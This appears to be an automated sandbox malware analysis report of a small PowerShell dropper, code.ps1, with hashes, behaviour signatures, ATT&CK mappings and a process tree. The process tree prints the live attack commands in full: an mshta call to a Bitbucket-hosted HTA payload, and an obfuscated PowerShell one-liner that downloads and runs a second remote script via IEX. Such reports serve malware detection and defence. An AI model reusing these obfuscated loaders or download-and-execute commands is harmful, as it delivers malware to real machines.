Overview

overview

10

Static

static

code.ps1

windows7-x64

10

code.ps1

windows10-2004-x64

10

Analysis

  • max time kernel
    43s
  • max time network
    104s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    30-09-2022 23:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    code.ps1

  • Size

    138B

  • MD5

    efa136867081936967a0ac27271b2fda

  • SHA1

    756f0d9e09882c8531618458e5d582fd5b46fbad

  • SHA256

    e4cda1631a3df7932fb319567b2696e096d1f59f66a6d1611436217943bd692e

  • SHA512

    77e76132c86321792cb621cc9c9f298b59a6ee813553fb2199a1ea82c60549c95c38ed0574c25b40faecfcccdd7931134fae8817fa8ac30c0eb405e4a2eed711

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /min mshta https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:628
      • C:\Windows\system32\mshta.exe
        mshta https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        PID:956
  • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
    POWERSHELL $HPJSWDLAZGWFDZYDFHWGFRU = '[%9%{!)<60%7]643]%((!^]y%9%{!)<60%7]643]%((!^]t\+!{{@901}8-#+([)]#/=}&{0}#23{1=##<%9-+90*4+.IO.%9%{!)<60%7]643]%((!^]t{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6&{0}#23{1=##<%9-+90*4+{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6d\+!{{@901}8-#+([)]#/=}{)]<5/]9928(@-%*})\<$@]'.Replace('%9%{!)<60%7]643]%((!^]','S').Replace('\+!{{@901}8-#+([)]#/=}','E').Replace('{)]<5/]9928(@-%*})\<$@','R').Replace('_#=#9)<+/&53\+]}70#-*6','A').Replace('&{0}#23{1=##<%9-+90*4+','M');$HFVVYPXEVBJEIVAVHEPLSDU = ($HPJSWDLAZGWFDZYDFHWGFRU -Join '')|&('I'+'EX');$HKLNYCJAXBTERCXRLWVDDRR = '[$0[-_<#)(+}%]\3%7\(5&#y$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[+&=#*$)4$<3}!1<)@3##5=m.N+&=#*$)4$<3}!1<)@3##5=*^(!+72@//61)!18$/<%8[.W+&=#*$)4$<3}!1<)@3##5=bR+&=#*$)4$<3}!1<)@3##5=qu+&=#*$)4$<3}!1<)@3##5=$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[]'.Replace('$0[-_<#)(+}%]\3%7\(5&#','S').Replace('+&=#*$)4$<3}!1<)@3##5=','E').Replace('*^(!+72@//61)!18$/<%8[','T');$HHKOVSNBTTKFPLKUTNGTEHB = ($HKLNYCJAXBTERCXRLWVDDRR -Join '')|&('I'+'EX');$HTZCELDOJQNRIVJVBXAVZND = '\][0{2=!#**(#<)4$/{=^%r11+[/-}*(1}3(}]+(#)6[]a<!=7!}\7)9&$[[)/4/&[/&11+[/-}*(1}3(}]+(#)6[]'.Replace('\][0{2=!#**(#<)4$/{=^%','C').Replace('11+[/-}*(1}3(}]+(#)6[]','E').Replace('<!=7!}\7)9&$[[)/4/&[/&','T');$HJJPDTCBEJQGGUGWFGICSKF = '{!@{8=!@4!(52!5=$1_##*&5<22_0_)1\%*#}*(6[867tR&5<22_0_)1\%*#}*(6[867[={9}@&&6*48{8}6_+3%=*pon[={9}@&&6*48{8}6_+3%=*&5<22_0_)1\%*#}*(6[867'.Replace('{!@{8=!@4!(52!5=$1_##*','G').Replace('&5<22_0_)1\%*#}*(6[867','E').Replace('[={9}@&&6*48{8}6_+3%=*','S');$HYRGAIQZLYZNHUPAAKKHBKR = 'G!!((=#^55=^9&7^3$_4=1/t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@pon7({=\[#%*6@0088{}\43}@!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/am'.Replace('7({=\[#%*6@0088{}\43}@','S').Replace('!!((=#^55=^9&7^3$_4=1/','E').Replace('[%\*\][6!)-[8$5!41<#1_','R');$HSIYIVTRGVUTCUUELHVIWZX = '}2=29-^$/4!#%4_6^(9<@[&_/2\4*4=(\7_]}](4_\_)a^[<2_/^@429<&238}@][#=To&_/2\4*4=(\7_]}](4_\_)n^[<2_/^@429<&238}@][#='.Replace('}2=29-^$/4!#%4_6^(9<@[','R').Replace('&_/2\4*4=(\7_]}](4_\_)','E').Replace('^[<2_/^@429<&238}@][#=','D');&('I'+'EX')($HFVVYPXEVBJEIVAVHEPLSDU::new($HHKOVSNBTTKFPLKUTNGTEHB::$HTZCELDOJQNRIVJVBXAVZND('https://bitbucket.org/!api/2.0/snippets/tinypro/dk958p/b15a5d7c2c03c07fb8aac916623be0799dce12bf/files/black1.txt').$HJJPDTCBEJQGGUGWFGICSKF().$HYRGAIQZLYZNHUPAAKKHBKR()).$HSIYIVTRGVUTCUUELHVIWZX())
    1⤵
    • Process spawned unexpected child process
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1944

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1
T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    6278f56a1a3ea516c5629446f3f0bc6b

    SHA1

    bd2aeb4e3c246d6386cadb098b0e4a0eed6f2503

    SHA256

    3e68c0aeda067470b3dad0aae7433d9744a928b5dc1518a822e169c9673e6107

    SHA512

    2c3d458c7a5def5a9f56c0e9cd228857077e9977da5d69ae2b572526216b088a57b1f35b459337e78756939baa9edcd56e0ee71f448899be89d3518bbbd793ca

    Download Submit
  • memory/628-59-0x0000000000000000-mapping.dmp
    Download
  • memory/956-60-0x0000000000000000-mapping.dmp
    Download
  • memory/1944-65-0x000007FEF2C80000-0x000007FEF36A3000-memory.dmp
    Filesize

    10.1MB

    Download
  • memory/1944-71-0x00000000020BB000-0x00000000020DA000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1944-70-0x00000000020B4000-0x00000000020B7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1944-69-0x00000000020BB000-0x00000000020DA000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1944-68-0x00000000020B4000-0x00000000020B7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1944-67-0x000000001B710000-0x000000001BA0F000-memory.dmp
    Filesize

    3.0MB

    Download
  • memory/1944-66-0x000007FEF2060000-0x000007FEF2BBD000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/2016-58-0x000000001B7A0000-0x000000001BA9F000-memory.dmp
    Filesize

    3.0MB

    Download
  • memory/2016-62-0x000000000284B000-0x000000000286A000-memory.dmp
    Filesize

    124KB

    Download
  • memory/2016-61-0x0000000002844000-0x0000000002847000-memory.dmp
    Filesize

    12KB

    Download
  • memory/2016-54-0x000007FEFB731000-0x000007FEFB733000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2016-57-0x0000000002844000-0x0000000002847000-memory.dmp
    Filesize

    12KB

    Download
  • memory/2016-56-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/2016-55-0x000007FEF3AA0000-0x000007FEF44C3000-memory.dmp
    Filesize

    10.1MB

    Download